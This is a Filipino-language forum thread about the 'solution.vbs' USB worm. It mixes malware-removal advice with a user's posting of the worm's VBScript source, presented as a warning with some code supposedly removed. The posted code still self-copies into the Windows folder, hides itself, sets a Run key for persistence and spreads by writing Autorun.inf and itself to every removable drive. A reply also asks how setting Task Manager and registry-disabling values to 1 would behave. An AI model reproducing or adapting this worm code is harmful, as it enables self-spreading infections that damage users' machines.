solution.VBS virus script

[9 Volts]

Try to scan in Safe Mode.

bakit po in safe mode? may pagkakaiba po ba yun sa scan ng normal?

[theeye23]

Yes,there is a difference. Most malwares make an entries to the Windows startup and the Windows startup will function only if the Windows loads in normal mode. The other thing is some malwares used hook functions only in normal mode. Except EXE infectors like SALITY, the system is infected in both modes.

That's why you need to scan it in safe mode.

[amadjo01]

kailangan bang i-delete tong mga keys na to?


      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"

paano po kung yung value nang disable taskmanager = "1"
"""""""""""""""""""""""""""""""""""""""""""""""""""  regedit = "1"
"""""""""""""""""""""""""""""""""""""""""""""""""""  nofolderoptions = "1"
tapos samahan pa ng disable gpedit = "1"
ano po ba mang yayari?

[amadjo01]

warning
another virus nakita nkuha sa usb flash drive
post ko dito na kung sakali mavirus kayo nito alam nyu alaing registry ang binabago ng virus
dinelete kong ang ilang code para hindi na magamit kung sakaling copyahin

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "solution.vbs" Then
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\solution.vbs")

Set myFile = fso.CreateTextFile(win & "\solution.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\solution.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""



While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If
     
         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Command=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\solution.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\solution.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

pug = fso.Deletefile("C:\WINDOWS\auto.vbs")


 


Wend

parang ganito po ang script ng astig.vbs

sa Flash drive din po para maikalat sya

[jacks]

paano po kung yung value nang disable taskmanager = "1"
"""""""""""""""""""""""""""""""""""""""""""""""""""  regedit = "1"
"""""""""""""""""""""""""""""""""""""""""""""""""""  nofolderoptions = "1"
tapos samahan pa ng disable gpedit = "1"
ano po ba mang yayari?

Kapag 1 means on, kapag 0 means off

Kaya kapag nofolderoptions =1 , means hidden ang nofolderoptions mo. Link nya ay sa explorer at control panel nakahide sya.

Yan ang pagkaalam ko.

No folder options on so hidden sya.